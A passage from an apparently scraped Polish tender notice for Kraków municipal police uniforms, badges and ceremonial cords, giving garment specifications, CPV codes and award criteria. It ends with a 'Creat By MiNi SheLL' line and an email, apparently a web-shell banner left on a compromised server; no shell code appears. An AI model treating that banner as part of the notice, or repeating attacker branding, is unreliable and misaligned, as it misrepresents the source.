Z przodu po obu stronach, na wysokości 24 do 26 cm od góry przy obłożeniu (wszycie stójki) po jednej kieszeni ciętej, zapinanej na zamek błyskawiczny żyłkowy długości 16 cm. Przody bluzy (kurtki) z podwójnej tkaniny do wysokości zakrywającej wszystkie kieszenie. Zakończenie przestębnowane. Z tyłu bluzy do wysokości pasa, fałdy  (o głębokości 3 cm zaszyte od góry 4 cm) umożliwiające swobodę ruchu. Na plecach napis w kolorze srebrnym Straż Miejska z literą Ż na żółtym odblaskowym tle. Wysokość liter min. 5 cm. Po środku tyłu szew pionowy dopasowujący bluzę do talii. Rękawy proste dwuczęściowe, zwężające się ku dołowi, zakończone patką zapinaną na rzep, z możliwością regulacji obwodu. Rzepy mają być wszyte na całej powierzchni patki (zgodnie z jej kształtem) i na całej szerokości mankietu 
W górnej części rękawa na wysokości 3 cm od góry (wszycie ramienia) naszyte skośnie kieszenie nakładane o wymiarach 17 cm szer. x 16 cm wys., zapinane patką na rzep o wysokości 6 do 6,5 cm., o ściętych rogach. 
Na kieszeniach naszyte emblematy Straży Miejskiej Miasta Krakowa, które zostaną dostarczone przez Zamawiającego. Na łokciach wzmocnienia naszyte z tej samej tkaniny co bluza. Pagony na ramionach zapinane na rzep. Maksymalna długość pagonów 15 cm, szerokość przy podstawie 5 cm, zakończone ściętymi bokami, 
w kształcie litery V. Rzepy i zamki błyskawiczne żyłkowe w kolorze czarnym. Pod pachami od 4 do 6 otworów wentylacyjnych, wykończonych obwódką metalową w kolorze czarnym lub srebrnym.
Spodnie wykonane z materiału o składzie: bawełna - 50%, poliester - 50% w kolorze ciemnogranatowym o widocznym splocie w kratkę tzw. rip-stop. Materiał nie może ulegać odbarwieniom pod wpływem prania, czyszczenia i warunków atmosferycznych (wymagany atest). Krój prosty, kieszenie w karczkach biodrowych. 
Z tyłu dwie cięte kieszenie z patkami o wym. 6 cm wys. x 14 cm szer. Po bokach na wysokości 21-23 cm od góry po jednej nakładanej kieszeni o wymiarach 19 cm szer. x 21 cm  wys., z trzema fałdami zaprasowanymi na bok oraz zapinana patką na rzep o ściętych rogach, o wymiarach 19 cm szer. x 6 cm wys. Pasek krojony w całości 
ze spodniami, podszyty obłożeniem. Na nim 7 podtrzymywaczy (szlufek) z taśmy rypsowej o szer. 2 cm i wys. 6 do 7 cm oraz klamerki regulujące obwód pasa również na rypsowych paskach. Na wysokości kolan na przodzie po 4 zaszewki (głębokość 
1 cm),  rozmieszczone po dwie na boku zewnętrznym i wewnętrznym. 
Pod kolanami wzmocnienie o wysokości 25 cm. Dół nogawki o szerokości  20 cm (40 cm obwód).
spodnie długie do munduru tzw. polowego                -  42 szt. 
Spodnie wykonane z materiału o składzie: bawełna - 50%, poliester - 50% w kolorze ciemnogranatowym o widocznym splocie w kratkę tzw. rip-stop. Materiał nie może ulegać odbarwieniom pod wpływem prania, czyszczenia i warunków atmosferycznych (wymagany atest).Krój prosty, kieszenie w karczkach biodrowych. 
Z tyłu dwie cięte kieszenie z patkami o wym. 6 cm wys. x 14 cm szer. Po bokach na wysokości 21-23 cm od góry po jednej nakładanej kieszeni o wymiarach 19 cm szer. x 21 cm  wys., z trzema fałdami zaprasowanymi na bok oraz zapinana patką na rzep o ściętych rogach, o wymiarach 19 cm szer. x 6 cm wys. Pasek krojony w całości 
ze spodniami, podszyty obłożeniem. Na nim 7 podtrzymywaczy (szlufek) z taśmy rypsowej o szer. 2 cm i wys. 6 do 7 cm oraz klamerki regulujące obwód pasa również na rypsowych paskach. Na wysokości kolan na przodzie po 4 zaszewki (głębokość 
1 cm),  rozmieszczone po dwie na boku zewnętrznym i wewnętrznym. 
Pod kolanami wzmocnienie o wysokości 25 cm. Dół nogawki o szerokości  20 cm (40 cm obwód)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 45</li>
<li>2. Jakość - 45</li>
<li>3. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> marynarka dwurzędowa, marynarka (jednorzędowa).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> marynarka dwurzędowa -  3 szt.                  
Marynarka dwurzędowa w kolorze ciemnogranatowym: materiał - elanowełna o gramaturze od 450 do 480g/mb (przy szerokości tkaniny 142 cm), 45% wełny, 55% elany (? 1%), rodzaj splotu - gabardyna, zapinana na guziki metalowe w kolorze żółtym z orłem stylizowanym, kieszeń wewnętrzna, dwie kieszenie zewnętrzne wpuszczane z patką, na lewej piersi kieszeń cięta z wypustką (butonierka), z otworem wykonanym na środku, do przypięcia znaku identyfikacyjnego, pagony zapinane na guziki metalowe w kolorze żółtym z orłem stylizowanym.
W cenie należy uwzględnić koszt naszycia emblematów, które zostaną przekazane przez Zamawiającego wybranemu w trybie przetargu Wykonawcy. 
marynarka (jednorzędowa) -  1 szt.             
Marynarka jednorzędowa w kolorze ciemnogranatowym: materiał - gabardyna o gramaturze od 480 do 500g/mb (przy szerokości tkaniny 142 cm), 45% wełny, 55% elany (? 1%), zapinana na guziki metalowe 
w kolorze żółtym z orłem stylizowanym, krój klasyczny, dopasowana w talii, 
4 kieszenie z kontrfałdą i patkami, na lewej górnej kieszeni w odległości 3 cm od dolnej krawędzi kieszeni dodatkowy mały guzik w kolorze czarnym na środku kontrfałdy, w podszewce dwie kieszenie wewnętrzne, pagony zapinane na guziki metalowe w kolorze żółtym z orłem stylizowanym.
W cenie należy uwzględnić koszt naszycia emblematów, które zostaną przekazane przez Zamawiającego wybranemu w trybie przetargu Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.23.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 45</li>
<li>2. Jakość - 45</li>
<li>3. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> identyfikator imienny, spinka do krawata.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> identyfikator imienny -  6 szt.   
Wykonany z mosiądzu o grubości 0,8 mm, napis obejmujący pierwszą literę imienia z kropką i nazwisko funkcjonariusza - grawerowany chemicznie, polerowany, rogi zaokrąglone, zabezpieczony lakierem bezbarwnym; wysokość liter 6 mm, wymiary: długość 70 lub 80 mm, szerokość 15 mm, zapięcie agrafkowe.
spinka do krawata -  32 szt.
Wykonana z mosiądzu o grubości 1 mm, grawerowana chemicznie bez koloru, polerowana; wysokość liter 4 mm; napis wyśrodkowany: STRAŻ MIEJSKA z literą Ż. Długość spinki maksymalnie 65 mm, szerokość 7 mm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 45</li>
<li>2. Jakość - 45</li>
<li>3. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> sznur galowy koloru żółtego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sznur galowy koloru żółtego	 - 80 szt.
Sznur galowy - pojedynczy sznur w kształcie pętli, przewieszony przez ramię pod naramiennikiem i ułożony pionowo pod pachą rękawa; spleciony w formie warkocza z jednym pojedynczym sznurkiem umieszczonym równolegle pod warkoczem, zakończony metalowym wisiorkiem z wizerunkiem orła, (nazywanym zwyczajowo buławą)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 45</li>
<li>2. Jakość - 45</li>
<li>3. Gwarancja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com